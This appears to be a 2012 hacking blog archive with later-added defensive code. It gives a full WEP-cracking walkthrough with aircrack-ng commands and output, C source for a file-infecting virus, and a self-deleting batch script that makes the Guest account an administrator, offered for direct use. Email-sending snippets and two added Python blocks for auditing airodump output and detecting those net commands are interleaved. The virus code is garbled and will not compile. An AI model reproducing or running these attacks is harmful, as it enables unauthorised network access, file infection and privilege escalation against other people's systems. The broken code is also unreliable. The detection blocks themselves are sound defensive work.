Thursday, January 12, 2012

WEP cracking

Step 1 - Start the wireless interface in monitor mode on AP channel

airmon-ng stop ath0

The system responds:



Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Step 2 - Test Wireless Device Packet Injection

aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0

Where:
-9 means injection test
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
ath0 is the wireless interface name

Step 3 - Start airodump-ng to capture the IVs

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0


While the injection is taking place (later), the screen will look similar to this:
 CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782

Step 4 - Use aireplay-ng to do a fake authentication with the access point

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:
-1 means fake authentication
0 is the reassociation timing in seconds
-e teddy is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
ath0 is the wireless interface name
Success looks like:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)

Step 5 - Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Step 6 - Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:
-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
output*.cap selects all files starting with "output" and ending in ".cap".

Here is what success looks like:

Aircrack-ng 0.9


[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
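
For auditing your own airspace, the airodump-ng screen from Step 3 already holds what a defender needs: the ENC column and the #/s rate. The following added example (not part of the original post) parses rows in that screen layout and flags WEP and open networks; the two extra sample rows, the RATE_THRESHOLD value and the function names are assumptions made for illustration.

```python
import re

# Constructed sample: the "teddy" AP row and the station row are the ones
# shown in Step 3; the other two AP rows are invented for contrast.
SAMPLE = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy
 02:00:00:00:00:01   55  98     4100      912    3   6  54  WPA2 CCMP   PSK  office lan
 02:00:00:00:00:02   30  90     3900       40    0  11  54  OPN              guest
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782
"""

CIPHERS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP", "WRAP"}
AUTHS = {"PSK", "MGT", "SKA", "OPN"}
RATE_THRESHOLD = 100  # assumption: frames/s treated as abnormal for one AP
# BSSID, PWR, RXQ, Beacons, (#Data), (#/s), CH, MB, (ENC), then the rest.
AP_ROW = re.compile(
    r"^\s*((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+-?\d+\s+\d+\s+\d+\s+"
    r"(\d+)\s+(\d+)\s+\d+\s+\S+\s+(\S+)(.*)$")


def parse_aps(screen):
    """Return one dict per access-point row; station rows are skipped."""
    aps = []
    for line in screen.splitlines():
        m = AP_ROW.match(line)
        if not m:
            continue
        bssid, data, rate, enc, rest = m.groups()
        tokens = rest.split()
        # CIPHER and AUTH may be blank (AUTH is for "teddy"), so consume them
        # only when the token is a known value; the remainder is the ESSID.
        cipher = tokens.pop(0) if tokens and tokens[0] in CIPHERS else ""
        auth = tokens.pop(0) if tokens and tokens[0] in AUTHS else ""
        aps.append({"bssid": bssid.upper(), "essid": " ".join(tokens),
                    "enc": enc, "cipher": cipher, "auth": auth,
                    "data": int(data), "rate": int(rate)})
    return aps


def audit(aps):
    findings = []  # (essid, finding) tuples for networks needing attention
    for ap in aps:
        if ap["enc"] == "WEP":
            findings.append((ap["essid"], "WEP in use: migrate to WPA2 or WPA3"))
            if ap["rate"] >= RATE_THRESHOLD:
                findings.append((ap["essid"], "high data rate on WEP: consistent with replayed traffic"))
        elif ap["enc"] == "OPN":
            findings.append((ap["essid"], "open network: traffic is unencrypted"))
    return findings
```

An ESSID that is itself a cipher or auth keyword (for example a network literally named "PSK") would be misread by this column heuristic.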

Wednesday, January 11, 2012

A virus in "C".

unsigned long x;
char buff[256];
struct ffblk;



clock_t st,end;

main() //www.ashu-hackingforever.blogspot.com
{
st=clock();
clrscr();
end=(findfirst("*.*",&ffblk,0);
while(!end)
{
virus=fopen(_args[0],"rb");
vhost=fopen(ffblk.ff_name,"rb+");
if(vhost==NULL)
goto next;
x=89088;
printf("infecting %s\n",ffblk.ff_name);
while(x>2048)
{
fread(buff,256,1,virus);
fwrite(buff,256,1,vhost);
x=2048;
}
fread(buff,x,1,virus);
fwrite(buff,1,vhost);
a++;
next: fcloseall();
done=findnext(&ffblk);
}
end=clock();
printf("infected %d file in %f sec",a,(end-st)/CLK-TCK);
return(0);
}

Create mail message object.

using System.Web.Mail; // namespace that provides MailMessage and SmtpMail

// create mail message object
MailMessage mail = new MailMessage();

mail.From = "";    // put the from address here
mail.To = "";      // put the to address here
mail.Subject = ""; // put the subject here
mail.Body = "";    // put the body of the email here

SmtpMail.SmtpServer = ""; // put the SMTP server you will use here

// and then send the mail
SmtpMail.Send(mail);



Here is the program's VC++ code:

#define _CRTDBG_MAP_ALLOC
#include <stdio.h>   // printf, freopen
#include "windows.h"
#include "crtdbg.h"
#include "string.h"

#include "CkSettings.h"
#include "CkEmail.h"
#include "CkEmailBundle.h"
#include "CkMailMan.h"
#include "CkString.h"
#include "CkByteData.h"

void EmailExample(void)
{
    CkMailMan mailman;

    // This seems to have a 30-day trial period.
    bool unlocked = mailman.UnlockComponent("30-day trial");
    if (!unlocked)
    {
        printf("Failed to unlock component\n");
        return;
    }

    mailman.put_SmtpHost("mail.earthlink.net");

    // This contains the actual email components
    CkEmail email;
    email.put_Body("This is a test\r\nThis is line #2");
    email.AddTo("Google Hacks","communityonwer@gmail.com");
    email.put_FromAddress("communityonwer@gmail.com");
    email.put_Subject("Google Hacks is the best site");

    if (!mailman.SendEmail(&email))
    {
        mailman.SaveLastError("errors.xml"); // error
    }
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // Send anything printed to stdout into a file, since a WinMain program has no console.
    freopen("stdout.txt","w",stdout);
    EmailExample();
    CkSettings::cleanupMemory();
    _CrtDumpMemoryLeaks();
    return 0;
}





If you want HTML, just replace the body with HTML code. Only basic HTML will work.

If you wish to add BCC recipients, add the following after email.AddTo(). Repeat it as many times as you need, once for each person you want to mail.

email.AddBcc("Orkut Tricks","communityonwer@gmail.com");

If you wish to add CC, just copy the above code and replace Bcc with cc.

Code to add attachments. Repeat this code as many times as you want, based on the number of attachments you want to send.

// Add a file attachment.
if (!email.AddFileAttachment("googlehacks.gif",0))
{
    email.SaveLastError("errors.xml");
    return;
}

If you want all your attachments to be zipped, then use this code after you have added all the attachments.

if (!email.ZipAttachments("googlehacks.zip"))
{
    email.SaveLastError("errors.xml");
    return;
}

How to get admin privileges.

The code below will allow a guest to be an admin. You will not be the actual admin but will get admin privileges.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


Copy this to Notepad and save the file as "anyname.bat", then double-click it.
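
Seen from the defending side, the commands in this script are straightforward to flag. The following is an added example (not part of the original post) that scans batch-file text or logged command lines for them; the rule names, sample input and severity labels are constructed for illustration, and the numbers in parentheses are the Windows Security event IDs the same actions generate.

```python
import re

NET = r"\bnet1?(?:\.exe)?\s+"   # net.exe hands off to net1.exe, so match both
RULES = [
    ("local account created (4720)",
     re.compile(NET + r"user\b.*\s/add\b", re.I)),
    ("member added to Administrators (4732)",
     re.compile(NET + r'localgroup\s+"?administrators"?\s.*/add\b', re.I)),
    ("Guest account enabled (4722)",
     re.compile(NET + r"user\s+guest\b.*/active:yes\b", re.I)),
    ("Guest removed from Guests group (4733)",
     re.compile(NET + r"localgroup\s+guests\s+guest\s+/delete\b", re.I)),
    ("script deletes itself",
     re.compile(r"^\s*@?del\b.*%~?\w*0\b", re.I)),
]

# Constructed sample: lines 2-3 are harmless listing commands; the rest are
# lines taken verbatim from the script in the post.
SAMPLE_BAT = """\
echo off
net user
net localgroup Administrators
net user add Username Password /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
"""


def scan(text):
    """Return (line_no, rule_name, line) for every rule that matches a line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            if rx.search(line):
                hits.append((no, name, line.strip()))
    return hits


def verdict(hits):
    """Privilege change plus self-deletion outranks either signal alone."""
    names = {name for _, name, _ in hits}
    priv = any("Administrators" in n or "account" in n for n in names)
    if priv and "script deletes itself" in names:
        return "high"
    return "review" if hits else "clean"
```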